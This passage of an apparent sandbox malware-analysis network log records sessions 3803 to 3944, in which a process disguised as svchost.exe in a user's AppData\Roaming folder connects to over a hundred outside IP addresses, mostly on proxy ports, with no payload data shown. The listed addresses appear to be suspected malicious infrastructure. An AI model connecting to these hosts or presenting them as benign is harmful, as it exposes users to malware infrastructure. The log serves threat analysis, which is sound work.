3803	192.168.2.5	62138	119.196.168.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3804	192.168.2.5	62124	91.241.217.58	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3805	192.168.2.5	61582	103.130.218.135	4002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3806	192.168.2.5	62178	172.67.182.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3807	192.168.2.5	62166	52.73.224.54	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3808	192.168.2.5	62158	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3809	192.168.2.5	61649	91.134.140.160	32896	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3810	192.168.2.5	59278	161.34.67.83	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3811	192.168.2.5	59146	91.134.140.160	5401	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3812	192.168.2.5	62145	43.131.248.165	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3813	192.168.2.5	62127	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3814	192.168.2.5	62155	212.50.19.150	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3815	192.168.2.5	62198	104.24.136.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3816	192.168.2.5	62161	46.17.63.166	9480	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3817	192.168.2.5	62159	43.155.130.182	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3818	192.168.2.5	62172	207.180.198.241	17228	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3819	192.168.2.5	62171	110.12.211.140	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3820	192.168.2.5	57867	121.204.179.70	7777	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3821	192.168.2.5	62287	36.94.2.138	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3822	192.168.2.5	62288	36.94.2.138	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3823	192.168.2.5	62289	36.94.2.138	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3824	192.168.2.5	62290	36.94.2.138	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3825	192.168.2.5	62215	185.162.229.127	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3826	192.168.2.5	62187	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3827	192.168.2.5	62234	185.238.228.240	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3828	192.168.2.5	62179	185.158.114.14	25697	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3829	192.168.2.5	60921	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3830	192.168.2.5	62180	222.223.103.232	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3831	192.168.2.5	62248	172.67.36.21	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3832	192.168.2.5	62209	198.199.86.11	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3833	192.168.2.5	59255	202.164.209.69	5020	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3834	192.168.2.5	62194	103.23.100.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3835	192.168.2.5	62262	104.25.184.189	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3836	192.168.2.5	62261	35.185.196.38	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3837	192.168.2.5	62269	34.49.208.221	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3838	192.168.2.5	61950	64.227.108.25	31908	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3839	192.168.2.5	61899	101.51.121.29	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3840	192.168.2.5	62196	190.128.228.182	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3841	192.168.2.5	62267	157.185.157.151	26589	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3842	192.168.2.5	62271	94.131.63.44	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3843	192.168.2.5	62270	172.245.159.177	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3844	192.168.2.5	62235	194.34.232.107	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3845	192.168.2.5	62293	104.18.234.218	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3846	192.168.2.5	62245	13.37.59.99	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3847	192.168.2.5	61971	157.245.255.29	5643	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3848	192.168.2.5	62250	46.17.63.166	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3849	192.168.2.5	62244	211.222.252.187	8193	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3850	192.168.2.5	61842	103.88.57.203	32650	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3851	192.168.2.5	62200	45.138.87.238	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3852	192.168.2.5	62258	136.244.99.51	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3853	192.168.2.5	62268	46.17.63.166	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3854	192.168.2.5	62051	72.167.222.113	4125	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3855	192.168.2.5	62254	193.239.58.92	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3856	192.168.2.5	62253	120.76.42.209	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3857	192.168.2.5	62259	123.126.158.50	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3858	192.168.2.5	59555	162.214.227.68	56796	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3859	192.168.2.5	62279	94.23.220.136	40767	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3860	192.168.2.5	62195	5.10.249.159	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3861	192.168.2.5	59436	159.223.71.71	49922	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3862	192.168.2.5	62246	90.188.250.16	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3863	192.168.2.5	62016	51.89.173.40	3100	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3864	192.168.2.5	62304	8.219.177.134	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3865	192.168.2.5	62329	142.4.123.41	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3866	192.168.2.5	60988	171.250.222.13	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3867	192.168.2.5	62024	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3868	192.168.2.5	59574	148.72.209.174	38088	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3869	192.168.2.5	59537	84.254.0.86	32650	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3870	192.168.2.5	62319	167.71.5.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3871	192.168.2.5	62004	91.134.140.160	27207	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3872	192.168.2.5	62365	93.190.24.119	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3873	192.168.2.5	62366	93.190.24.119	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3874	192.168.2.5	62368	93.190.24.119	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3875	192.168.2.5	62369	93.190.24.119	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3876	192.168.2.5	62331	46.17.63.166	9480	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3877	192.168.2.5	62328	119.196.168.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3878	192.168.2.5	59646	67.227.186.83	56370	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3879	192.168.2.5	62330	43.131.248.165	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3880	192.168.2.5	62230	36.134.91.82	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3881	192.168.2.5	62341	121.159.146.251	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3882	192.168.2.5	59709	162.214.225.223	58240	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3883	192.168.2.5	59714	92.204.136.149	18629	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3884	192.168.2.5	59664	154.16.116.166	2512	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3885	192.168.2.5	62344	120.48.62.239	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3886	192.168.2.5	62339	43.155.130.182	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3887	192.168.2.5	59649	103.186.8.162	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3888	192.168.2.5	62362	157.185.157.151	26589	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3889	192.168.2.5	62358	185.158.114.14	25697	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3890	192.168.2.5	62364	3.9.71.167	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3891	192.168.2.5	61977	72.195.114.169	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3892	192.168.2.5	61595	184.170.245.148	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3893	192.168.2.5	62359	103.23.100.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3894	192.168.2.5	62384	104.129.199.57	8800	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3895	192.168.2.5	62115	163.15.183.33	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3896	192.168.2.5	62390	43.157.44.79	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3897	192.168.2.5	62405	43.157.50.206	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3898	192.168.2.5	62410	43.157.44.79	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3899	192.168.2.5	62411	43.157.44.79	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3900	192.168.2.5	62413	43.157.44.79	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3901	192.168.2.5	62374	34.95.243.122	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3902	192.168.2.5	62375	46.17.63.166	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3903	192.168.2.5	62376	46.17.63.166	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3904	192.168.2.5	60355	199.102.105.242	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3905	192.168.2.5	62380	123.126.158.50	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3906	192.168.2.5	62378	45.138.87.238	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3907	192.168.2.5	62082	184.170.248.5	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3908	192.168.2.5	62409	142.4.123.41	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3909	192.168.2.5	62382	120.76.42.209	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3910	192.168.2.5	62197	12.186.205.123	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3911	192.168.2.5	62163	13.81.217.201	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3912	192.168.2.5	62395	154.12.178.107	29985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3913	192.168.2.5	62415	92.204.134.38	25825	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3914	192.168.2.5	59896	209.126.104.38	39369	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3915	192.168.2.5	59911	107.180.90.88	62908	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3916	192.168.2.5	62298	64.227.108.25	31908	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3917	192.168.2.5	60261	153.139.233.218	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3918	192.168.2.5	62431	198.199.86.11	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3919	192.168.2.5	62407	8.219.177.134	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3920	192.168.2.5	62458	172.67.181.12	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3921	192.168.2.5	62391	103.127.1.130	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3922	192.168.2.5	62453	157.185.157.151	26589	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3923	192.168.2.5	62462	104.16.108.204	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3924	192.168.2.5	62199	45.120.178.197	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3925	192.168.2.5	62428	161.97.173.42	53948	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3926	192.168.2.5	62451	12.11.59.114	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3927	192.168.2.5	62473	45.144.30.232	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3928	192.168.2.5	62474	45.144.30.232	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3929	192.168.2.5	62476	45.144.30.232	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3930	192.168.2.5	62477	45.144.30.232	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3931	192.168.2.5	62460	162.243.102.207	9764	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3932	192.168.2.5	62446	46.17.63.166	9480	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3933	192.168.2.5	62494	43.157.32.230	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3934	192.168.2.5	62445	119.196.168.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3935	192.168.2.5	62436	51.161.131.84	25843	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3936	192.168.2.5	62237	72.167.221.145	50335	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3937	192.168.2.5	59921	91.134.140.160	2572	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3938	192.168.2.5	59912	212.33.205.42	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3939	192.168.2.5	62416	90.188.250.16	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3940	192.168.2.5	62469	50.63.12.33	45134	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3941	192.168.2.5	62252	161.97.173.42	62289	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3942	192.168.2.5	62216	92.205.110.47	14936	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3943	192.168.2.5	62491	104.17.16.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3944	192.168.2.5	62500	45.12.31.140	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

